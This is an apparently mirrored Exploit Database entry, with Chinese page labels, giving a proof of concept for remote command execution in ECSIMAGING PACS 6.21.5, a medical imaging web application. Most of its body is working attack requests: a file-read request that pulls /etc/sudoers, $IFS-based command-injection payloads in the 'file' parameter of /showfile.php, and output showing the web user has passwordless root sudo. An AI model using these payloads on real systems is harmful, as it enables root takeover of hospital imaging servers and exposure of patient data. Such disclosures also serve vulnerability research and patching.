ECSIMAGING PACS 6.21.5 – Remote code execution

Exploit Database
12 阅读

作者： shoxxdj

日期： 2021-01-07
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/49388/

# Exploit Title: ECSIMAGING PACS 6.21.5 - Remote code execution
# Date: 06/01/2021
# Exploit Author: shoxxdj
# Vendor Homepage: https://www.medicalexpo.fr/
# Version: 6.21.5 and bellow ( tested on 6.21.5,6.21.3 )
# Tested on: Linux

ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability.
The parameter "file" on the webpage /showfile.php can be exploited with simple OS injection to gain root access.
www-data user has sudo NOPASSWD access :

/showfile.php?file=/etc/sudoers
[...]
www-data ALL=NOPASSWD: ALL
[...]

Command injection can be realized with the $IFS tricks : <url>/showfile.php?file=;ls$IFS-la$IFS/

/showfile.php?file=;sudo$IFS-l
[...]
User www-data may run the following commands on this host:
(root) NOPASSWD: ALL
[...]

last Exploits
ECSIMAGING PACS 6.21.5 – Remote code execution的更多信息

Textpattern CMS 4.9.0-dev – ‘Excerpt’ Persistent Cross-Site Scripting (XSS)：
Alstrasoft e-Friends 5.12 – SQL Injection：
DELTAScripts PHPClassifieds – ‘rate.php’ Blind SQL Injection：
Caldera – ‘/costview2/printers.php?tr’ SQL Injection：
Cotonti 0.9.2 – Multiple SQL Injections：
Joomla! Component com_ybggal 1.0 – ‘catid’ SQL Injection：
Pligg CMS 1.0.4 – ‘story.php’ SQL Injection：
Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS：